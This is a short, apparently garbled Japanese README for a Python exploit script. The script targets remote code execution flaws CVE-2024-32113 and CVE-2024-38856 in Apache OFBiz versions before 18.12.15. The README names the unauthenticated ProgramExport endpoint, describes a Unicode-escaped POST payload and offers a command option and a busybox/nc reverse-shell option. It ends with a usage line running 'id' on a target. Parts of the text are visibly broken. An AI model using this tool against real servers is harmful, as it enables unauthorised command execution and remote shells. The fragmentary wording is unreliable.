
CVE-2024-32113 & CVE-2024-38856
このPythonスクリプトは、Apache OFBiz (バージョン 18.12.15 未満) における Remote Code Execution (RCE) タイプの脆弱性を、エンドポイント /webtools/control/forgotPassword/ProgramExport への不正アクセスを介して悪用します。
\uXXXX) に変換)を POST 経由で送信。--cmd)busybox/nc によるリバースシェル (--shell)python3 cve-2024-38856_Scanner.py -u https://TARGET:8443 -c "id"